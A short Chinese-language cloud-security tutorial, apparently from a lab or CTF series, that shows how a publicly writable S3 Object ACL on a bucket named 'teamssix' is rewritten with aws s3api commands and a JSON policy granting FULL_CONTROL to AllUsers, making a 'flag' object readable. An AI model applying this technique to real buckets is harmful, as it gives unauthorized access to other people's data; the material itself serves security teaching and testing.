Object ACL 可写

读取 Object 时提示被禁止

查看目标 Object 策略发现是可读的，且内容如下：

aws s3api get-object-acl --bucket teamssix --key flag

这个策略和上面的 Bucket ACL 策略一样，表示任何人都可以访问、写入当前 ACL，但是不能读取、写入对象

将权限修改为 FULL_CONTROL 后，Object ACL 策略如下：

{
    "Owner": {
        "ID": "d24***5"
    },
    "Grants": [
	{
            "Grantee": {
                "Type": "Group", 
                "URI": "http://acs.amazonaws.com/groups/global/AllUsers"
            }, 
            "Permission": "FULL_CONTROL"
        } 
    ]
}

1
2
3
4
5
6
7
8
9
10
11
12
13
14

将该策略写入后，就可以读取对象了

aws s3api put-object-acl --bucket teamssix --key flag --access-control-policy file://acl.json

Bucket ACL 可写 Bucket 策略可写